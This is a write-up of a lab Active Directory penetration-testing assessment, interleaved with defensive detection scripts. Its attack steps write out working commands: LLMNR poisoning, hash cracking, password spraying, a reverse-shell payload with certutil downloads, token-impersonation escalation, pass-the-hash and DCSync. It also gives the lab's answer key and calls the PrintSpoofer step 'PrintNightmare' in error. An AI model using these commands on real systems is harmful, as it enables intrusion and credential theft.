AD Enumeration & Attacks - Skills Assessment Part II

Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Let's begin by starting Responder with its default settings on the internal interface.

sudo responder -I ens224

Let's review the Responder logs to determine if any hashes were captured.

cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt

Answer: AB920

Q2) What is this user's cleartext password?

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt

Answer: weasal

Q3) Submit the contents of the C:\flag.txt file on MS01.

Let's first check which hosts in the internal range are alive.

fping -asgq 172.16.7.0/23

Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which host corresponds to MS01.

sudo nmap -v -A -iL hosts.txt

  • 172.16.7.3: DC01
  • 172.16.7.50: MS01
  • 172.16.7.60: SQL01
  • 172.16.7.240: Our Parrot machine

Let's verify whether the user ab920 can log in to 172.16.7.50 and determine which protocol (SMB or WinRM) accepts the credentials.

crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal'
crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal'

Let's use Evil-WinRM to authenticate with the ab920 account.

evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal'

Answer: aud1t_gr0up_m3mbersh1ps!

Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

It is now time to build a list of valid domain users for the upcoming password spraying attack.

sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt

We now have 2,904 valid usernames in the domain. Let's now proceed with the password spraying attack.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

Answer: BR086
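The spray above succeeds because a single source tries one password against thousands of accounts in a few seconds, which is also the pattern a defender can alert on. The following detector is an added example (not part of this walkthrough); the log format, account names and addresses are constructed. It groups failed logons per source address and raises an alert when the number of distinct accounts failing from one source inside a sliding window reaches a threshold. A spray through Kerberos pre-authentication, as kerbrute performs, shows up on the domain controller as Event ID 4771 (pre-authentication failed) rather than 4625, so the detector accepts both.

```python
"""Flag password spraying from failed-logon records: one source, many distinct
accounts, short window. Added example, not part of the original walkthrough;
the log lines, account names and addresses below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
THRESHOLD = 8  # distinct accounts failing from a single source within WINDOW

# Constructed records in the form timestamp|event_id|account|source_ip.
# 4771 = Kerberos pre-authentication failed (what a kerbrute spray produces on the DC),
# 4625 = account failed to log on (NTLM / interactive paths).
SAMPLE_LOG = """\
2024-05-01T09:00:01|4771|USER001|10.0.0.77
2024-05-01T09:00:01|4771|USER002|10.0.0.77
2024-05-01T09:00:02|4771|USER003|10.0.0.77
2024-05-01T09:00:02|4771|USER004|10.0.0.77
2024-05-01T09:00:03|4771|USER005|10.0.0.77
2024-05-01T09:00:03|4771|USER006|10.0.0.77
2024-05-01T09:00:04|4771|USER007|10.0.0.77
2024-05-01T09:00:04|4771|USER008|10.0.0.77
2024-05-01T09:00:05|4771|USER009|10.0.0.77
2024-05-01T09:00:05|4771|USER010|10.0.0.77
2024-05-01T09:10:00|4625|JSMITH|10.0.0.5
2024-05-01T09:10:04|4625|JSMITH|10.0.0.5
2024-05-01T09:10:09|4625|JSMITH|10.0.0.5
"""


def parse_log(text):
    """Parse the constructed records into sorted (timestamp, event_id, account, source) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, account, src = line.split("|")
        events.append((datetime.fromisoformat(ts), int(event_id), account.upper(), src))
    return sorted(events)


def detect_spray(events, window=WINDOW, threshold=THRESHOLD):
    """Return {source_ip: (distinct_accounts, window_start, window_end)} for every
    source whose distinct failed accounts inside `window` reach `threshold`."""
    by_src = defaultdict(list)
    for ts, event_id, account, src in events:
        if event_id in (4625, 4771):
            by_src[src].append((ts, account))

    alerts = {}
    for src, items in by_src.items():
        start = 0
        for end in range(len(items)):
            # Slide the window forward until it spans at most `window`.
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {acct for _, acct in items[start:end + 1]}
            if len(distinct) >= threshold and len(distinct) > alerts.get(src, (0,))[0]:
                alerts[src] = (len(distinct), items[start][0], items[end][0])
    return alerts


if __name__ == "__main__":
    for src, (count, first, last) in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"ALERT {src}: {count} distinct accounts failed between {first} and {last}")
```

The user who mistypes their own password three times (10.0.0.5) never trips the rule, because the count is of distinct accounts, not of failures. Pairing this with a sensible lockout policy and by excluding Welcome1-style seasonal passwords through a banned-password filter removes both the signal the attacker relies on and the weak credential it finds.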

Q5) What is this user's password?

Answer: Welcome1

Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

Let's enumerate shares on the domain controller to identify any resources on which br086 has read access.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

I found a shared folder named 'Department Shares' to which we have read access. Let's proceed to review its contents.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

I found a file named web.config in the results. Let's review its contents to identify any relevant information.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config

Answer: D@ta_bAse_adm1n!
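The web.config finding above is a readable plaintext SQL credential sitting on a broad-access share. The audit script below is an added example (not part of this walkthrough): it parses a constructed web.config, splits each connection string into its key/value pairs, and reports any string that carries a Password or Pwd value. Sections encrypted with the ASP.NET protected-configuration feature carry a configProtectionProvider attribute and contain no readable string, so the script skips them; that is also the remediation (aspnet_regiis -pe "connectionStrings"), alongside Integrated Security so no SQL password is needed at all. The user name and password in the sample are placeholders.

```python
"""Audit web.config files for plaintext SQL credentials in connection strings.
Added example, not part of the original walkthrough; both configs below are
constructed and the user/password values are placeholders."""
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb"
         connectionString="Server=SQL01;Database=App;User Id=app_user;Password=PLACEHOLDER_PASSWORD;" />
    <add name="ReportsDb"
         connectionString="Server=SQL01;Database=Reports;Integrated Security=SSPI;" />
  </connectionStrings>
</configuration>
"""

# Constructed example of the same section after aspnet_regiis -pe "connectionStrings"
ENCRYPTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData>
      <CipherData><CipherValue>PLACEHOLDER_CIPHERTEXT</CipherValue></CipherData>
    </EncryptedData>
  </connectionStrings>
</configuration>
"""


def parse_connection_string(cs: str) -> dict:
    """Split 'key=value;' pairs into a dict with lower-cased keys."""
    parts = {}
    for chunk in cs.split(";"):
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    return parts


def audit_web_config(xml_text: str) -> list:
    """Return one finding per connection string that embeds a plaintext password."""
    root = ET.fromstring(xml_text)
    findings = []
    for section in root.iter("connectionStrings"):
        # An encrypted section carries configProtectionProvider and no readable strings.
        if section.get("configProtectionProvider"):
            continue
        for entry in section.findall("add"):
            parts = parse_connection_string(entry.get("connectionString", ""))
            password = parts.get("password") or parts.get("pwd")
            if not password:
                continue
            findings.append({
                "name": entry.get("name"),
                "server": parts.get("server") or parts.get("data source"),
                "user": parts.get("user id") or parts.get("uid"),
                "issue": "plaintext password in connection string",
            })
    return findings


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(finding)
    print("encrypted section findings:", audit_web_config(ENCRYPTED_WEB_CONFIG))
```

Run against the share contents recursively (every web.config, app.config and *.config that smbmap lists), the same function turns a one-off discovery into a repeatable control; the Integrated Security string in the sample produces no finding because there is no secret to leak.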

Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

Next, we will use the credentials from web.config to authenticate to SQL01 with Impacket's mssqlclient.py.

python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60

We have successfully accessed SQL01; however, the SQL service account lacks the permissions needed to read the flag. Let's review the privileges of the account running the service.

EXEC xp_cmdshell 'whoami /priv'

We have the SeImpersonatePrivilege enabled, which can be leveraged for privilege escalation by exploiting the PrintNightmare vulnerability.

Let's generate a reverse shell payload with msfvenom and obtain PrintSpoofer.exe. Both files will be served over HTTP from the attack host and downloaded onto SQL01.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe

Next, let's download both files onto SQL01 with certutil via xp_cmdshell.

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe"

Let's start the Meterpreter listener in msfconsole:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 1335
exploit

Then, from the mssqlclient session, launch PrintSpoofer so that it runs our payload with the elevated token:

xp_cmdshell 'C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe'

It is now time to retrieve the flag from the Meterpreter shell.

more C:\Users\administrator\Desktop\flag.txt

Answer: s3imp3rs0nate_cl@ssic

Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

We now have SYSTEM-level privileges on SQL01; the next step is to dump the local Administrator's NTLM hash with Kiwi.

load kiwi
lsa_dump_creds

Next, we will use this hash in a pass-the-hash connection to MS01.

evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

Answer: exc3ss1ve_adm1n_r1ights!

Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Let's download PowerView.ps1 onto MS01 to enumerate the Access Control List (ACL) of the Domain Admins group (RID 512).

certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

I encountered an error while attempting this, so let's proceed using our Meterpreter session instead.

use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

Let's apply a filter for the GenericAll permission.

Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID | Where-Object { $_.ActiveDirectoryRights -match "GenericAll" }

Next, let's convert the security identifier (SID) of the matching ACE to a username to identify the associated user.

Convert-SidtoName "S-1-5-21-3327542485-274640656-2609762496-4611"

Answer: CT059
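The GenericAll filter above is a one-off check; an administrator wants the same question answered continuously for every privileged group. The script below is an added example (not part of this walkthrough) of that audit over constructed ACE records shaped like PowerView's output: it decodes the ActiveDirectoryRights bitmask using the .NET ActiveDirectoryRights enum values, treats GenericAll, WriteDacl, WriteOwner and WriteProperty on the member attribute as control rights, and reports every principal holding one that is not SYSTEM, BUILTIN\Administrators, Domain Admins or Enterprise Admins. The domain SID, RIDs and the non-member attribute GUID in the sample are constructed.

```python
"""Flag principals with control rights over a privileged group. Added example,
not part of the original walkthrough; the domain SID, RIDs and ACE records are
constructed. Right values are those of System.DirectoryServices.ActiveDirectoryRights."""

RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000,
}
GENERIC_ALL = 0xF01FF  # 983551: the value PowerView shows as GenericAll
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # schemaIDGUID of the 'member' attribute
ALL_OBJECTS_GUID = "00000000-0000-0000-0000-000000000000"   # ACE applies to all attributes

# Principals expected to control Domain Admins: SYSTEM, BUILTIN\Administrators,
# and the domain's own Domain Admins (512) / Enterprise Admins (519).
EXPECTED_SIDS = {"S-1-5-18", "S-1-5-32-544"}
EXPECTED_RIDS = {512, 519}

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed
SAMPLE_ACES = [
    {"SecurityIdentifier": "S-1-5-18", "ActiveDirectoryRights": GENERIC_ALL, "AceType": "AccessAllowed"},
    {"SecurityIdentifier": DOMAIN_SID + "-512", "ActiveDirectoryRights": GENERIC_ALL, "AceType": "AccessAllowed"},
    {"SecurityIdentifier": "S-1-5-11", "ActiveDirectoryRights": 0x14, "AceType": "AccessAllowed"},  # Authenticated Users: read only
    {"SecurityIdentifier": DOMAIN_SID + "-1105", "ActiveDirectoryRights": GENERIC_ALL, "AceType": "AccessAllowed"},  # stray user
    {"SecurityIdentifier": DOMAIN_SID + "-1106", "ActiveDirectoryRights": 0x20, "AceType": "AccessAllowedObject",
     "ObjectAceType": MEMBER_ATTR_GUID},  # can write 'member' = can add itself to the group
    {"SecurityIdentifier": DOMAIN_SID + "-1107", "ActiveDirectoryRights": 0x20, "AceType": "AccessAllowedObject",
     "ObjectAceType": "00000000-0000-0000-0000-0000000000ab"},  # constructed non-member attribute: harmless
]


def decode_rights(mask: int) -> list:
    """Translate an ActiveDirectoryRights mask into the names PowerView would print."""
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    return [name for name, bit in RIGHTS.items() if mask & bit]


def is_expected(sid: str) -> bool:
    if sid in EXPECTED_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and int(sid.rsplit("-", 1)[1]) in EXPECTED_RIDS


def control_rights(ace: dict) -> list:
    """Rights in this ACE that let the holder take over the group."""
    names = decode_rights(ace["ActiveDirectoryRights"])
    found = [n for n in names if n in ("GenericAll", "WriteDacl", "WriteOwner")]
    scope = ace.get("ObjectAceType", ALL_OBJECTS_GUID).lower()
    if "WriteProperty" in names and scope in (ALL_OBJECTS_GUID, MEMBER_ATTR_GUID):
        found.append("WriteProperty(member)")
    return found


def audit_group_aces(aces: list) -> list:
    """Return (sid, rights) for every unexpected principal with control rights."""
    findings = []
    for ace in aces:
        if not ace["AceType"].startswith("AccessAllowed"):
            continue
        rights = control_rights(ace)
        if rights and not is_expected(ace["SecurityIdentifier"]):
            findings.append((ace["SecurityIdentifier"], rights))
    return findings


if __name__ == "__main__":
    for sid, rights in audit_group_aces(SAMPLE_ACES):
        print(f"{sid}: {', '.join(rights)}")
```

Running the same check against the ACLs of Domain Admins, Enterprise Admins, Administrators and the AdminSDHolder object (whose ACL is copied onto protected groups every hour by SDProp) surfaces exactly the kind of stray GenericAll that this assessment abuses.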

Q10) Crack this user's password hash and submit the cleartext password as your answer.

For this task, we will use Inveigh on MS01 to poison LLMNR and NBT-NS name resolution in an attempt to capture the NetNTLMv2 hash of the target user.

certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y -FileOutput Y

Let's save the captured hash to a file and attempt to crack it using Hashcat.

hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt

Answer: charlie1
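Both captures in this assessment (Q1/Q2 with Responder, Q10 with Inveigh) hand the attacker the same thing: a NetNTLMv2 challenge/response line that hashcat mode 5600 verifies offline, guess by guess. The block below is an added example (not part of this walkthrough) that carries out that verification explicitly so the exposure is visible: NT hash = MD4(UTF-16LE password), NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) + domain), and the logged NTProofStr = HMAC-MD5(NTLMv2 key, server challenge + blob). A candidate password is correct exactly when it reproduces NTProofStr, which is why a weak password falls within seconds of capture and why the fix is to stop the capture (disable LLMNR and NBT-NS, require SMB signing) rather than to hope the response cannot be cracked. The user, domain, password, challenge and blob are constructed; MD4 is implemented in pure Python because OpenSSL 3 builds often omit it.

```python
"""Verify a candidate password against a captured NetNTLMv2 exchange, the same
check hashcat -m 5600 performs. Added example, not part of the original
walkthrough: user, domain, password, challenge and blob below are constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds frequently lack hashlib MD4."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def do_round(state, fn, const, order, shifts, words):
        a, b, c, d = state
        for i in range(16):
            a = rotl((a + fn(b, c, d) + words[order[i]] + const) & MASK, shifts[i % 4])
            a, b, c, d = d, a, b, c  # rotate register roles for the next step
        return a, b, c, d

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        s = do_round(state, f, 0, range(16), (3, 7, 11, 19), words)
        s = do_round(s, g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), words)
        s = do_round(s, h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), words)
        state = tuple((x + y) & MASK for x, y in zip(state, s))
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return _md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    # NTLMv2 hash = HMAC-MD5(NT hash, UPPER(user) + domain), both UTF-16LE
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def parse_5600(line: str):
    """Split a hashcat mode-5600 line: USER::DOMAIN:challenge:ntproofstr:blob."""
    user, _, domain, challenge, proof, blob = line.split(":", 5)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def verify_candidate(line: str, password: str) -> bool:
    """True when `password` reproduces the NTProofStr recorded in the capture."""
    user, domain, challenge, proof, blob = parse_5600(line)
    calc = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(calc, proof)


def recover_password(line: str, wordlist):
    """Return the first wordlist entry that verifies, or None."""
    for word in wordlist:
        if verify_candidate(line, word):
            return word
    return None


def build_capture(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> str:
    """Emit the 5600-format line Responder/Inveigh would log for this exchange (constructed)."""
    proof = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).hexdigest()
    return f"{user}::{domain}:{challenge.hex()}:{proof}:{blob.hex()}"


# Constructed sample: 8-byte server challenge and a short NTLMv2 blob
SAMPLE_LINE = build_capture("Spring2024!", "JDOE", "EXAMPLE",
                            bytes.fromhex("1122334455667788"),
                            bytes.fromhex("0101000000000000" + "00" * 24))

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", recover_password(SAMPLE_LINE, ["letmein", "Password1", "Spring2024!"]))
```

The NT hash test vectors (MD4 of the empty string and the NT hash of "password") anchor the implementation to the real algorithm; everything after that is two HMAC-MD5 calls per guess, which is what makes rockyou.txt-scale dictionaries practical against these captures.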

Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

We now hold credentials for CT059, who has GenericAll over the Domain Admins group. Therefore, we can add this user to Domain Admins and then perform a DCSync attack.

Let's edit the proxychains configuration file (/etc/proxychains.conf) on our own machine to route traffic through a SOCKS4 proxy on local port 9050. This will allow us to reach MS01 over RDP through the Parrot host using the credentials of the user CT059.

sudo nano /etc/proxychains.conf

Next, establish an SSH connection to the Parrot host with dynamic port forwarding, which creates the SOCKS proxy on local port 9050.

ssh -D 9050 htb-student@10.129.221.33

Let's now authenticate to the MS01 server via RDP using the credentials of user CT059.

proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/

Let's proceed to add this account to the Domain Admins group.

net group "Domain Admins" ct059 /add /domain

It is now time to move to DC01 using PowerShell remoting with the CT059 credentials.

$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force))
Enter-PSSession -ComputerName DC01 -Credential $cred

Answer: acLs_f0r_th3_w1n!

Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

Now, let's authenticate to DC01 with psexec.py and execute a DCSync attack with Mimikatz to retrieve the KRBTGT hash.

psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3
lsadump::dcsync /user:inlanefreight\krbtgt

Answer: 7eba70412d81c1cd030d72a3e8dbe05f
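DCSync is a legitimate replication request made by an account that should not be replicating. With "Audit Directory Service Access" enabled and a SACL on the domain object, each such request produces Event ID 4662 whose Properties field lists the control-access right GUIDs exercised; the three replication rights have fixed GUIDs. The detector below is an added example (not part of this walkthrough) that matches those GUIDs and alerts when the requester is not a known domain controller computer account. The event records and the allowlist of DC accounts are constructed.

```python
"""Detect DCSync-style replication requests from Event ID 4662 records: a
replication extended right exercised by something that is not a domain
controller. Added example, not part of the original walkthrough; the event
records and the DC allowlist below are constructed."""
import re

# Control-access rights that DCSync requires (well-known schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}  # constructed allowlist of DC computer accounts

# Constructed 4662 records; "%%7688" is the Control Access token in the Properties field.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},          # normal DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},                   # user account replicating: DCSync
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "Properties": "%%7684 {00000000-0000-0000-0000-0000000000ab}"},           # constructed attribute read, not replication
]


def replication_rights(properties: str) -> list:
    """Names of the replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: list, known_dcs=KNOWN_DC_ACCOUNTS) -> list:
    """Return (account, rights) for every replication request by a non-DC account."""
    allow = {name.upper() for name in known_dcs}
    alerts = []
    for ev in events:
        # 0x100 = Control Access: the mask for exercising an extended right
        if ev.get("EventID") != 4662 or ev.get("AccessMask", "").lower() != "0x100":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if rights and ev["SubjectUserName"].upper() not in allow:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {account}: {', '.join(rights)}")
```

Accounts that legitimately replicate without being DCs (for example an Azure AD Connect service account) belong in the allowlist rather than being ignored, so that any new principal granted these rights, as CT059 was here through group membership, is reviewed the first time it uses them.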
